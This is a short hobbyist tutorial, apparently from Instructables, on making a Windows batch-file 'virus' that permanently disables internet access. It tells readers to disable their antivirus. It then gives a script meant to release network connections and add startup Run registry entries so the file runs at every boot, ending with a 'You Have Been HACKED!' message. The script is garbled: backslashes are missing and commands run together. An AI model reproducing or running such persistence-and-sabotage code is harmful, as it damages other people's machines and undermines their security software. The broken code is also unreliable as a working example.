How to Disable Internet Permanently (Notepad)

by Like Tea in Circuits > Computers

35 Views, 1 Favorites, 0 Comments

How to Disable Internet Permanently (Notepad)

download.png

This tutorial will show you how to make a virus that Disables Internet Permanently.

NOTE: This post is solely and mainly for educational purpose only. I am nowhere responsible for any kind of damage caused by this tutorial.

Making the File

How To Disable Internet Permanently (Notepad)

To make the hack, first you want to open "File Explorer", right click then click "New" - "Text Document".

After that you need to make sure that in view you have checked the box "File Name Extensions", this is so you change the file extension. Now name the text document "<name>.bat", make sure you added .bat at the end! Congratulations you have completed the first step to making your Notepad Virus!!

Delete Internet Permanently Hack Script

Make sure to turn off your Anti Virus Software, otherwise your script will be removed. Copy & Paste this script into your .bat file by clicking the file, right clicking and selecting "edit".

echo @echo off>c:windowswimn32.bat

echo break off>c:windowswimn32.bat echo

ipconfig/release_all>c:windowswimn32.bat

echo end>c:windowswimn32.batreg add

hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add

hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED!

PAUSE

Save File

Now all you need to do to finish the Windows Hack is to click "save", or Ctrl S.